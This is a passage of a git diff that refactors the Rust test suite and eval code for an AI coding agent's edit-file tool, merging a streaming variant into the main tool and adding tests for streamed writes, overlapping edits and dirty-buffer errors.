assert!( - error_msg.contains("has been modified since you last read it"), - "Error should mention file modification, got: {}", - error_msg + error.contains("has changed on disk since you last read it"), + "Error should mention possible disk change, got: {error}" ); + assert!(diff.is_empty()); + assert_eq!(input_path, Some(PathBuf::from("root/test.txt"))); } #[gpui::test] - async fn test_dirty_buffer_detected(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "test.txt": "original content" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - 
let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let languages = project.read_with(cx, |project, _| project.languages().clone()); - let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); - - let read_tool = Arc::new(crate::ReadFileTool::new(project.clone(), action_log, true)); - let edit_tool = Arc::new(EditFileTool::new( + async fn test_streaming_dirty_buffer_detected(cx: &mut TestAppContext) { + let (tool, project, action_log, _fs, _thread) = + setup_test(cx, json!({"test.txt": "original content"})).await; + let read_tool = Arc::new(crate::ReadFileTool::new( project.clone(), - thread.downgrade(), - languages, - Templates::new(), + action_log.clone(), + true, )); // Read the file first @@ -2529,7 +3529,7 @@ mod tests { .await .unwrap(); - // Open the buffer and make it dirty by editing without saving + // Open the buffer and make it dirty let project_path = project .read_with(cx, |project, cx| { project.find_project_path("root/test.txt", cx) @@ -2540,24 +3540,27 @@ mod tests { .await .unwrap(); - // Make an in-memory edit to the buffer (making it dirty) buffer.update(cx, |buffer, cx| { let end_point = buffer.max_point(); buffer.edit([(end_point..end_point, " added text")], None, cx); }); - // Verify buffer is dirty let is_dirty = buffer.read_with(cx, |buffer, _| buffer.is_dirty()); assert!(is_dirty, "Buffer should be dirty after in-memory edit"); // Try to edit - should fail because buffer has unsaved changes let result = cx .update(|cx| { - edit_tool.clone().run( + tool.clone().run( ToolInput::resolved(EditFileToolInput { display_description: "Edit with dirty buffer".into(), path: "root/test.txt".into(), mode: EditFileMode::Edit, + content: None, + edits: Some(vec![Edit { + old_text: "original content".into(), + new_text: "new content".into(), + }]), }), ToolCallEventStream::test().0, cx, @@ 
-2565,75 +3568,841 @@ mod tests { }) .await; - assert!(result.is_err(), "Edit should fail when buffer is dirty"); - let error_msg = result.unwrap_err().to_string(); + let EditFileToolOutput::Error { + error, + diff, + input_path, + } = result.unwrap_err() + else { + panic!("expected error"); + }; assert!( - error_msg.contains("This file has unsaved changes."), + error.contains("This file has unsaved changes."), "Error should mention unsaved changes, got: {}", - error_msg + error ); assert!( - error_msg.contains("keep or discard"), + error.contains("keep or discard"), "Error should ask whether to keep or discard changes, got: {}", - error_msg + error ); - // Since save_file and restore_file_from_disk tools aren't added to the thread, - // the error message should ask the user to manually save or revert assert!( - error_msg.contains("save or revert the file manually"), + error.contains("save or revert the file manually"), "Error should ask user to manually save or revert when tools aren't available, got: {}", - error_msg + error + ); + assert!(diff.is_empty()); + assert!(input_path.is_none()); + } + + #[gpui::test] + async fn test_streaming_overlapping_edits_resolved_sequentially(cx: &mut TestAppContext) { + // Edit 1's replacement introduces text that contains edit 2's + // old_text as a substring. Because edits resolve sequentially + // against the current buffer, edit 2 finds a unique match in + // the modified buffer and succeeds. 
+ let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "aaa\nbbb\nccc\nddd\neee\n"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Setup: resolve the buffer + sender.send_partial(json!({ + "display_description": "Overlapping edits", + "path": "root/file.txt", + "mode": "edit" + })); + cx.run_until_parked(); + + // Edit 1 replaces "bbb\nccc" with "XXX\nccc\nddd", so the + // buffer becomes "aaa\nXXX\nccc\nddd\nddd\neee\n". + // Edit 2's old_text "ccc\nddd" matches the first occurrence + // in the modified buffer and replaces it with "ZZZ". + // Edit 3 exists only to mark edit 2 as "complete" during streaming. + sender.send_partial(json!({ + "display_description": "Overlapping edits", + "path": "root/file.txt", + "mode": "edit", + "edits": [ + {"old_text": "bbb\nccc", "new_text": "XXX\nccc\nddd"}, + {"old_text": "ccc\nddd", "new_text": "ZZZ"}, + {"old_text": "eee", "new_text": "DUMMY"} + ] + })); + cx.run_until_parked(); + + // Send the final input with all three edits. + sender.send_full(json!({ + "display_description": "Overlapping edits", + "path": "root/file.txt", + "mode": "edit", + "edits": [ + {"old_text": "bbb\nccc", "new_text": "XXX\nccc\nddd"}, + {"old_text": "ccc\nddd", "new_text": "ZZZ"}, + {"old_text": "eee", "new_text": "DUMMY"} + ] + })); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. 
} = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "aaa\nXXX\nZZZ\nddd\nDUMMY\n"); + } + + #[gpui::test] + async fn test_streaming_create_content_streamed(cx: &mut TestAppContext) { + let (tool, project, _action_log, _fs, _thread) = setup_test(cx, json!({"dir": {}})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Transition to BufferResolved + sender.send_partial(json!({ + "display_description": "Create new file", + "path": "root/dir/new_file.txt", + "mode": "write" + })); + cx.run_until_parked(); + + // Stream content incrementally + sender.send_partial(json!({ + "display_description": "Create new file", + "path": "root/dir/new_file.txt", + "mode": "write", + "content": "line 1\n" + })); + cx.run_until_parked(); + + // Verify buffer has partial content + let buffer = project.update(cx, |project, cx| { + let path = project + .find_project_path("root/dir/new_file.txt", cx) + .unwrap(); + project.get_open_buffer(&path, cx).unwrap() + }); + assert_eq!(buffer.read_with(cx, |b, _| b.text()), "line 1\n"); + + // Stream more content + sender.send_partial(json!({ + "display_description": "Create new file", + "path": "root/dir/new_file.txt", + "mode": "write", + "content": "line 1\nline 2\n" + })); + cx.run_until_parked(); + assert_eq!(buffer.read_with(cx, |b, _| b.text()), "line 1\nline 2\n"); + + // Stream final chunk + sender.send_partial(json!({ + "display_description": "Create new file", + "path": "root/dir/new_file.txt", + "mode": "write", + "content": "line 1\nline 2\nline 3\n" + })); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |b, _| b.text()), + "line 1\nline 2\nline 3\n" + ); + + // Send final input + sender.send_full(json!({ + "display_description": "Create new file", + "path": "root/dir/new_file.txt", + "mode": "write", + "content": "line 1\nline 2\nline 3\n" + 
})); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "line 1\nline 2\nline 3\n"); + } + + #[gpui::test] + async fn test_streaming_overwrite_diff_revealed_during_streaming(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = setup_test( + cx, + json!({"file.txt": "old line 1\nold line 2\nold line 3\n"}), + ) + .await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, mut receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Transition to BufferResolved + sender.send_partial(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write" + })); + cx.run_until_parked(); + + // Get the diff entity from the event stream + receiver.expect_update_fields().await; + let diff = receiver.expect_diff().await; + + // Diff starts pending with no revealed ranges + diff.read_with(cx, |diff, cx| { + assert!(matches!(diff, Diff::Pending(_))); + assert!(!diff.has_revealed_range(cx)); + }); + + // Stream first content chunk + sender.send_partial(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write", + "content": "new line 1\n" + })); + cx.run_until_parked(); + + // Diff should now have revealed ranges showing the new content + diff.read_with(cx, |diff, cx| { + assert!(diff.has_revealed_range(cx)); + }); + + // Send final input + sender.send_full(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write", + "content": "new line 1\nnew line 2\n" + })); + + let result = task.await; + let EditFileToolOutput::Success { + new_text, old_text, .. 
+ } = result.unwrap() + else { + panic!("expected success"); + }; + assert_eq!(new_text, "new line 1\nnew line 2\n"); + assert_eq!(*old_text, "old line 1\nold line 2\nold line 3\n"); + + // Diff is finalized after completion + diff.read_with(cx, |diff, _| assert!(matches!(diff, Diff::Finalized(_)))); + } + + #[gpui::test] + async fn test_streaming_overwrite_content_streamed(cx: &mut TestAppContext) { + let (tool, project, _action_log, _fs, _thread) = setup_test( + cx, + json!({"file.txt": "old line 1\nold line 2\nold line 3\n"}), + ) + .await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Transition to BufferResolved + sender.send_partial(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write" + })); + cx.run_until_parked(); + + // Verify buffer still has old content (no content partial yet) + let buffer = project.update(cx, |project, cx| { + let path = project.find_project_path("root/file.txt", cx).unwrap(); + project.open_buffer(path, cx) + }); + let buffer = buffer.await.unwrap(); + assert_eq!( + buffer.read_with(cx, |b, _| b.text()), + "old line 1\nold line 2\nold line 3\n" + ); + + // First content partial replaces old content + sender.send_partial(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write", + "content": "new line 1\n" + })); + cx.run_until_parked(); + assert_eq!(buffer.read_with(cx, |b, _| b.text()), "new line 1\n"); + + // Subsequent content partials append + sender.send_partial(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write", + "content": "new line 1\nnew line 2\n" + })); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |b, _| b.text()), + "new line 1\nnew line 2\n" + ); + + // Send final input with complete content + sender.send_full(json!({ + 
"display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write", + "content": "new line 1\nnew line 2\nnew line 3\n" + })); + + let result = task.await; + let EditFileToolOutput::Success { + new_text, old_text, .. + } = result.unwrap() + else { + panic!("expected success"); + }; + assert_eq!(new_text, "new line 1\nnew line 2\nnew line 3\n"); + assert_eq!(*old_text, "old line 1\nold line 2\nold line 3\n"); + } + + #[gpui::test] + async fn test_streaming_edit_json_fixer_escape_corruption(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "hello\nworld\nfoo\n"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + sender.send_partial(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "edit" + })); + cx.run_until_parked(); + + // Simulate JSON fixer producing a literal backslash when the LLM + // stream cuts in the middle of a \n escape sequence. + // The old_text "hello\nworld" would be streamed as: + // partial 1: old_text = "hello\\" (fixer closes incomplete \n as \\) + // partial 2: old_text = "hello\nworld" (fixer corrected the escape) + sender.send_partial(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "hello\\"}] + })); + cx.run_until_parked(); + + // Now the fixer corrects it to the real newline. + sender.send_partial(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "hello\nworld"}] + })); + cx.run_until_parked(); + + // Send final. 
+ sender.send_full(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "hello\nworld", "new_text": "HELLO\nWORLD"}] + })); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "HELLO\nWORLD\nfoo\n"); + } + + #[gpui::test] + async fn test_streaming_final_input_stringified_edits_succeeds(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "hello\nworld\n"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + sender.send_partial(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "edit" + })); + cx.run_until_parked(); + + sender.send_full(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "edit", + "edits": "[{\"old_text\": \"hello\\nworld\", \"new_text\": \"HELLO\\nWORLD\"}]" + })); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "HELLO\nWORLD\n"); + } + + // Verifies that after streaming_edit_file_tool edits a file, the action log + // reports changed buffers so that the Accept All / Reject All review UI appears. 
+ #[gpui::test] + async fn test_streaming_edit_file_tool_registers_changed_buffers(cx: &mut TestAppContext) { + let (tool, _project, action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Allow; + agent_settings::AgentSettings::override_global(settings, cx); + }); + + let (event_stream, _rx) = ToolCallEventStream::test(); + let task = cx.update(|cx| { + tool.clone().run( + ToolInput::resolved(EditFileToolInput { + display_description: "Edit lines".to_string(), + path: "root/file.txt".into(), + mode: EditFileMode::Edit, + content: None, + edits: Some(vec![Edit { + old_text: "line 2".into(), + new_text: "modified line 2".into(), + }]), + }), + event_stream, + cx, + ) + }); + + let result = task.await; + assert!(result.is_ok(), "edit should succeed: {:?}", result.err()); + + cx.run_until_parked(); + + let changed = action_log.read_with(cx, |log, cx| log.changed_buffers(cx)); + assert!( + !changed.is_empty(), + "action_log.changed_buffers() should be non-empty after streaming edit, + but no changed buffers were found - Accept All / Reject All will not appear" ); } + // Same test but for Write mode (overwrite entire file). 
#[gpui::test] - async fn test_sensitive_settings_kind_detects_nonexistent_subdirectory( + async fn test_streaming_edit_file_tool_write_mode_registers_changed_buffers( cx: &mut TestAppContext, ) { - let fs = project::FakeFs::new(cx.executor()); - let config_dir = paths::config_dir(); - fs.insert_tree(&*config_dir.to_string_lossy(), json!({})) - .await; - let path = config_dir.join("nonexistent_subdir_xyz").join("evil.json"); + let (tool, _project, action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "original content"})).await; + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Allow; + agent_settings::AgentSettings::override_global(settings, cx); + }); + + let (event_stream, _rx) = ToolCallEventStream::test(); + let task = cx.update(|cx| { + tool.clone().run( + ToolInput::resolved(EditFileToolInput { + display_description: "Overwrite file".to_string(), + path: "root/file.txt".into(), + mode: EditFileMode::Write, + content: Some("completely new content".into()), + edits: None, + }), + event_stream, + cx, + ) + }); + + let result = task.await; + assert!(result.is_ok(), "write should succeed: {:?}", result.err()); + + cx.run_until_parked(); + + let changed = action_log.read_with(cx, |log, cx| log.changed_buffers(cx)); assert!( - matches!( - sensitive_settings_kind(&path, fs.as_ref()).await, - Some(SensitiveSettingsKind::Global) - ), - "Path in non-existent subdirectory of config dir should be detected as sensitive: {:?}", - path + !changed.is_empty(), + "action_log.changed_buffers() should be non-empty after streaming write, \ + but no changed buffers were found \u{2014} Accept All / Reject All will not appear" ); } #[gpui::test] - async fn test_sensitive_settings_kind_detects_deeply_nested_nonexistent_subdirectory( + async fn test_streaming_edit_file_tool_fields_out_of_order_in_write_mode( cx: &mut TestAppContext, ) { - let fs = 
project::FakeFs::new(cx.executor()); - let config_dir = paths::config_dir(); - fs.insert_tree(&*config_dir.to_string_lossy(), json!({})) - .await; - let path = config_dir.join("a").join("b").join("c").join("evil.json"); - assert!( - matches!( - sensitive_settings_kind(&path, fs.as_ref()).await, - Some(SensitiveSettingsKind::Global) - ), - "Path in deeply nested non-existent subdirectory of config dir should be detected as sensitive: {:?}", - path + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "old_content"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "write" + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "write", + "content": "new_content" + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "write", + "content": "new_content", + "path": "root" + })); + cx.run_until_parked(); + + // Send final. + sender.send_full(json!({ + "display_description": "Overwrite file", + "mode": "write", + "content": "new_content", + "path": "root/file.txt" + })); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. 
} = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "new_content"); + } + + #[gpui::test] + async fn test_streaming_edit_file_tool_fields_out_of_order_in_edit_mode( + cx: &mut TestAppContext, + ) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "old_content"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "edit" + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "edit", + "edits": [{"old_text": "old_content"}] + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "edit", + "edits": [{"old_text": "old_content", "new_text": "new_content"}] + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "edit", + "edits": [{"old_text": "old_content", "new_text": "new_content"}], + "path": "root" + })); + cx.run_until_parked(); + + // Send final. + sender.send_full(json!({ + "display_description": "Overwrite file", + "mode": "edit", + "edits": [{"old_text": "old_content", "new_text": "new_content"}], + "path": "root/file.txt" + })); + cx.run_until_parked(); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "new_content"); + } + + #[gpui::test] + async fn test_streaming_edit_partial_last_line(cx: &mut TestAppContext) { + let file_content = indoc::indoc! 
{r#" + fn on_query_change(&mut self, cx: &mut Context) { + self.filter(cx); + } + + + + fn render_search(&self, cx: &mut Context) -> Div { + div() + } + "#} + .to_string(); + + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.rs": file_content})).await; + + // The model sends old_text with a PARTIAL last line. + let old_text = "}\n\n\n\nfn render_search"; + let new_text = "}\n\nfn render_search"; + + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + sender.send_full(json!({ + "display_description": "Remove extra blank lines", + "path": "root/file.rs", + "mode": "edit", + "edits": [{"old_text": old_text, "new_text": new_text}] + })); + + let result = task.await; + let EditFileToolOutput::Success { + new_text: final_text, + .. + } = result.unwrap() + else { + panic!("expected success"); + }; + + // The edit should reduce 3 blank lines to 1 blank line before + // fn render_search, without duplicating the function signature. 
+ let expected = file_content.replace("}\n\n\n\nfn render_search", "}\n\nfn render_search"); + pretty_assertions::assert_eq!( + final_text, + expected, + "Edit should only remove blank lines before render_search" ); } #[gpui::test] - async fn test_sensitive_settings_kind_returns_none_for_non_config_path( + async fn test_streaming_edit_preserves_blank_line_after_trailing_newline_replacement( cx: &mut TestAppContext, ) { - let fs = project::FakeFs::new(cx.executor()); - let path = PathBuf::from("/tmp/not_a_config_dir/some_file.json"); + let file_content = "before\ntarget\n\nafter\n"; + let old_text = "target\n"; + let new_text = "one\ntwo\ntarget\n"; + let expected = "before\none\ntwo\ntarget\n\nafter\n"; + + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.rs": file_content})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + sender.send_full(json!({ + "display_description": "description", + "path": "root/file.rs", + "mode": "edit", + "edits": [{"old_text": old_text, "new_text": new_text}] + })); + + let result = task.await; + + let EditFileToolOutput::Success { + new_text: final_text, + .. 
+ } = result.unwrap() + else { + panic!("expected success"); + }; + + pretty_assertions::assert_eq!( + final_text, + expected, + "Edit should preserve a single blank line before test_after" + ); + } + + #[gpui::test] + async fn test_streaming_reject_created_file_deletes_it(cx: &mut TestAppContext) { + let (tool, _project, action_log, fs, _thread) = setup_test(cx, json!({"dir": {}})).await; + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Allow; + agent_settings::AgentSettings::override_global(settings, cx); + }); + + // Create a new file via the streaming edit file tool + let (event_stream, _rx) = ToolCallEventStream::test(); + let task = cx.update(|cx| { + tool.clone().run( + ToolInput::resolved(EditFileToolInput { + display_description: "Create new file".into(), + path: "root/dir/new_file.txt".into(), + mode: EditFileMode::Write, + content: Some("Hello, World!".into()), + edits: None, + }), + event_stream, + cx, + ) + }); + let result = task.await; + assert!(result.is_ok(), "create should succeed: {:?}", result.err()); + cx.run_until_parked(); + + assert!( + fs.is_file(path!("/root/dir/new_file.txt").as_ref()).await, + "file should exist after creation" + ); + + // Reject all edits — this should delete the newly created file + let changed = action_log.read_with(cx, |log, cx| log.changed_buffers(cx)); + assert!( + !changed.is_empty(), + "action_log should track the created file as changed" + ); + + action_log + .update(cx, |log, cx| log.reject_all_edits(None, cx)) + .await; + cx.run_until_parked(); + assert!( - sensitive_settings_kind(&path, fs.as_ref()).await.is_none(), - "Path outside config dir should not be detected as sensitive: {:?}", - path + !fs.is_file(path!("/root/dir/new_file.txt").as_ref()).await, + "file should be deleted after rejecting creation, but an empty file was left behind" ); } + + #[test] + fn 
test_input_deserializes_double_encoded_fields() { + let input = serde_json::from_value::(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "\"edit\"", + "edits": "[{\"old_text\": \"hello\\nworld\", \"new_text\": \"HELLO\\nWORLD\"}]" + })) + .expect("input should deserialize"); + + assert!(matches!(input.mode, EditFileMode::Edit)); + let edits = input.edits.expect("edits should deserialize"); + assert_eq!(edits.len(), 1); + assert_eq!(edits[0].old_text, "hello\nworld"); + assert_eq!(edits[0].new_text, "HELLO\nWORLD"); + + let input = serde_json::from_value::(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "\"edit\"" + })) + .expect("input should deserialize"); + assert!(input.edits.is_none()); + + let input = serde_json::from_value::(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "\"edit\"", + "edits": null + })) + .expect("input should deserialize"); + assert!(input.edits.is_none()); + + let input = serde_json::from_value::(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "\"edit\"", + "edits": "[{\"old_text\": \"hello\\nworld\", \"new_text\": \"HELLO\\nWORLD\"}]" + })) + .expect("input should deserialize"); + + assert!(matches!(input.mode, Some(EditFileMode::Edit))); + let edits = input.edits.expect("edits should deserialize"); + assert_eq!(edits.len(), 1); + assert_eq!(edits[0].old_text.as_deref(), Some("hello\nworld")); + assert_eq!(edits[0].new_text.as_deref(), Some("HELLO\nWORLD")); + + let input = serde_json::from_value::(json!({ + "display_description": "Edit", + "path": "root/file.txt" + })) + .expect("input should deserialize"); + assert!(input.mode.is_none()); + assert!(input.edits.is_none()); + + let input = serde_json::from_value::(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": null, + "edits": null + })) + .expect("input should deserialize"); + assert!(input.mode.is_none()); + 
assert!(input.edits.is_none()); + } + + async fn setup_test_with_fs( + cx: &mut TestAppContext, + fs: Arc, + worktree_paths: &[&std::path::Path], + ) -> ( + Arc, + Entity, + Entity, + Arc, + Entity, + ) { + let project = Project::test(fs.clone(), worktree_paths.iter().copied(), cx).await; + let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); + let context_server_registry = + cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); + let model = Arc::new(FakeLanguageModel::default()); + let thread = cx.new(|cx| { + crate::Thread::new( + project.clone(), + cx.new(|_cx| ProjectContext::default()), + context_server_registry, + Templates::new(), + Some(model), + cx, + ) + }); + let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); + let tool = Arc::new(EditFileTool::new( + project.clone(), + thread.downgrade(), + action_log.clone(), + language_registry, + )); + (tool, project, action_log, fs, thread) + } + + async fn setup_test( + cx: &mut TestAppContext, + initial_tree: serde_json::Value, + ) -> ( + Arc, + Entity, + Entity, + Arc, + Entity, + ) { + init_test(cx); + let fs = project::FakeFs::new(cx.executor()); + fs.insert_tree("/root", initial_tree).await; + setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await + } + + fn init_test(cx: &mut TestAppContext) { + cx.update(|cx| { + let settings_store = SettingsStore::test(cx); + cx.set_global(settings_store); + SettingsStore::update_global(cx, |store: &mut SettingsStore, cx| { + store.update_user_settings(cx, |settings| { + settings + .project + .all_languages + .defaults + .ensure_final_newline_on_save = Some(false); + }); + }); + }); + } } diff --git a/crates/agent/src/edit_agent/reindent.rs b/crates/agent/src/tools/edit_file_tool/reindent.rs similarity index 100% rename from crates/agent/src/edit_agent/reindent.rs rename to crates/agent/src/tools/edit_file_tool/reindent.rs diff --git 
a/crates/agent/src/edit_agent/streaming_fuzzy_matcher.rs b/crates/agent/src/tools/edit_file_tool/streaming_fuzzy_matcher.rs similarity index 100% rename from crates/agent/src/edit_agent/streaming_fuzzy_matcher.rs rename to crates/agent/src/tools/edit_file_tool/streaming_fuzzy_matcher.rs diff --git a/crates/agent/src/tools/evals/streaming_edit_file.rs b/crates/agent/src/tools/evals/streaming_edit_file.rs index c82f652daca933..770e1f0effc2ab 100644 --- a/crates/agent/src/tools/evals/streaming_edit_file.rs +++ b/crates/agent/src/tools/evals/streaming_edit_file.rs @@ -1,8 +1,8 @@ -use crate::tools::streaming_edit_file_tool::*; +use crate::tools::edit_file_tool::*; use crate::{ AgentTool, ContextServerRegistry, EditFileTool, GrepTool, GrepToolInput, ListDirectoryTool, - ListDirectoryToolInput, ReadFileTool, ReadFileToolInput, StreamingEditFileTool, Template, - Templates, Thread, ToolCallEventStream, ToolInput, + ListDirectoryToolInput, ReadFileTool, ReadFileToolInput, Template, Templates, Thread, + ToolCallEventStream, ToolInput, }; use Role::*; use anyhow::{Context as _, Result}; @@ -73,7 +73,7 @@ impl EvalInput { struct EvalSample { text_before: String, text_after: String, - tool_input: StreamingEditFileToolInput, + tool_input: EditFileToolInput, diff: String, } @@ -359,12 +359,10 @@ impl StreamingEditToolTest { .collect(); tools.push(LanguageModelRequestTool { name: EditFileTool::NAME.to_string(), - description: StreamingEditFileTool::description().to_string(), - input_schema: StreamingEditFileTool::input_schema( - LanguageModelToolSchemaFormat::JsonSchema, - ) - .to_value(), - use_input_streaming: StreamingEditFileTool::supports_input_streaming(), + description: EditFileTool::description().to_string(), + input_schema: EditFileTool::input_schema(LanguageModelToolSchemaFormat::JsonSchema) + .to_value(), + use_input_streaming: EditFileTool::supports_input_streaming(), }); tools } @@ -464,7 +462,7 @@ impl StreamingEditToolTest { }); let action_log = thread.read_with(cx, 
|thread, _| thread.action_log().clone()); - let tool = Arc::new(StreamingEditFileTool::new( + let tool = Arc::new(EditFileTool::new( self.project.clone(), thread.downgrade(), action_log, @@ -488,7 +486,7 @@ impl StreamingEditToolTest { } }; - let StreamingEditFileToolOutput::Success { new_text, .. } = &output else { + let EditFileToolOutput::Success { new_text, .. } = &output else { anyhow::bail!("Tool returned error output: {}", output); }; @@ -517,7 +515,7 @@ impl StreamingEditToolTest { &self, request: LanguageModelRequest, cx: &mut TestAppContext, - ) -> Result { + ) -> Result { let model = self.model.clone(); let events = cx .update(|cx| { @@ -539,7 +537,7 @@ impl StreamingEditToolTest { if tool_use.is_input_complete && tool_use.name.as_ref() == EditFileTool::NAME => { - let input: StreamingEditFileToolInput = serde_json::from_value(tool_use.input) + let input: EditFileToolInput = serde_json::from_value(tool_use.input) .context("Failed to parse tool input as StreamingEditFileToolInput")?; return Ok(input); } diff --git a/crates/agent/src/tools/streaming_edit_file_tool.rs b/crates/agent/src/tools/streaming_edit_file_tool.rs deleted file mode 100644 index 7d229e1f53fa73..00000000000000 --- a/crates/agent/src/tools/streaming_edit_file_tool.rs +++ /dev/null @@ -1,4410 +0,0 @@ -use super::edit_file_tool::EditFileTool; -use super::restore_file_from_disk_tool::RestoreFileFromDiskTool; -use super::save_file_tool::SaveFileTool; -use super::tool_edit_parser::{ToolEditEvent, ToolEditParser}; -use crate::ToolInputPayload; -use crate::{ - AgentTool, Thread, ToolCallEventStream, ToolInput, - edit_agent::{ - reindent::{Reindenter, compute_indent_delta}, - streaming_fuzzy_matcher::StreamingFuzzyMatcher, - }, -}; -use acp_thread::Diff; -use action_log::ActionLog; -use agent_client_protocol::schema::{self as acp, ToolCallLocation, ToolCallUpdateFields}; -use anyhow::Result; -use collections::HashSet; -use futures::FutureExt as _; -use gpui::{App, AppContext, AsyncApp, Entity, 
